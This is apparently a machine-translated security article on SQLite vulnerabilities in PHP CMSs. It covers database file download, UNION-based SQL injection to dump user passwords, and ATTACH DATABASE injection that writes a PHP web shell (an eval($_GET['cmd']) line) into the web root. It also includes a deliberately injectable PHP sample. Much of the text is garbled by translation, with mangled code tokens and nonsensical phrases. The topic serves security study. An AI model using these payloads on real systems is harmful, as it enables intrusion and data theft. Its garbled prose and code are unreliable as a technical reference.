Common Vulnerabilities in PHP and Sqlite

Common Vulnerabilities in PHP and Sqlite

 0x00 pre-renewal

SQLite is a lightweight database, and PHP developers are never confused. After PHP5, it has been integrated with this lightweight embedded database product by default. there are some common security threats to the CMS that uses PHP/Sqlite in Taobao. I will analyze the following several examples and welcome to point out the shortcomings and errors.

0x01 database download

As a lightweight database that hosts a single volume file, there is a similar Access problem, that is, database download. in the tested CMS, the fixed/default database name/address issue exists. Downloading may cause security threats. some CMS still have security threats, such as XiaoCMS.

The seemingly undownloadable # % vulnerability allows the hacker to bypass using URL encoding. Because of the short uploads File Name Vulnerability, the random Upload File name is no longer secure, you only need to guess the 4-digit combination of 0-9a-f to download the data:

For reference to the database protection method of Access, some CMS modifies the database suffix to php and creates a "create table" table. <? Php '(a); "to prevent downloading, but it also introduces new security threats.

0x02 database GetShell

The first is Akcms. The database Suffix of the Sqlite version is php, but the connection is '<? The php' table is not added either. You only need to obtain the six-digit database file name (which can be guessed) and GetShell can be used. The following is an example of inserting a token into phpinfo:

While the straw hacker CMS adds the hacker into '<? Php 'table, but no error is thrown in PHP, you can still download the database content.

 

 

The hacker at the front-end used the strip_tags () function to filter the escape variable, avoiding direct GetShell. however, you can download the password for cracking management through the database, and edit the hosts file in the background as needed, posing a security threat.

0x03 injection into syntax

The following PHP script is written for testing in sequence.

The sqlite. db file connecting to the Database Connector is as follows:

We can see that the id input is not filtered and can be used by us. A Demo is as follows:

If you enter 1-3 for a normal id, the corresponding name can be returned. Injection statement:

4 union select user, pass, id from user where id = 1;

You can use union to query the pass value with id 1. similar to MySQL5.x, Sqlite has a table named "tables" similar to information_schema, which is not displayed by default. The table names include "type", "name", "tbl_name", "rootpage", and "SQL, SQL fields are more valuable to explain. first, the echo position of the test is 2.

 

Query SQL field content

 

The table structure can be obtained as shown in the preceding figure. In addition, some syntaxes commonly seen in the examples are similar to those in Mysql:

Annotator :-

Connector: |

Substring: substr (a, B, c)

Length: length (x)

0x04 note GetShell

In Sqlite, the Attach statement can be used to Attach a database (if the sequence file does not exist, the GetShell file is created). This statement can be used to inject GetShell into Sqlite, but the preceding database query statement is as follows:

$ Db-> query ($ SQL );

Is the GetShell environment in which the hacker cannot Attach to create files and test the Sqlite3 database creation.

The statement is as follows:

<? Php

If (isset ($ _ GET ['id']) {

$ Id = $ _ GET ['id'];

} Else {

Echo "id! ";

Exit;

}

$ Db = new PDO ('sqlite: sqlite3.db ');

$ SQL = "select * from user where id = $ id ";

Echo "

Var_dump (@ $ db-> exec ($ SQL ));

 

In this case, you can use the injection statement to insert a WebShell.

Test Statement 1:

4; attach database 'C: \ wamp \ www \ le4f. php' AS pwn; CREATE T

ABLE pwn. exp (dataz text); insert into pwn. exp (dataz) VALUES (

'<? Php phpinfo ();?> ');--

Obtain phpinfo.

Write a WebShell:

 

4 ; ATTACH DATABASE 'C:\\wamp\\www\\shell.php' AS pwn ; CREATE

TABLE pwn. exp (dataz text); insert into pwn. exp (dataz) VALUES

('<? Eval ($ _ GET ['cmd']);?> ');--

 

PHP can call Sqlite in multiple ways. It is assumed that the execute and exec statement methods may both be GetShell. For the Sqlite2 database, the following code:

$ Db = new PDO ('sqlite2: sqlite. db ');

$ Db-> exec ($ SQL );

You can note the Export Statement Attach to create an empty upload file, but the data cannot be inserted. If you have any research, please refer to "Issue 2.

0x05 Summary

Similar to the Access database, Sqlite is lightweight and convenient, and there are also many threats that can be exploited. It is also a concern for developers. the above is only the ice cream angle which I have viewed. More problems are discovered by the readers.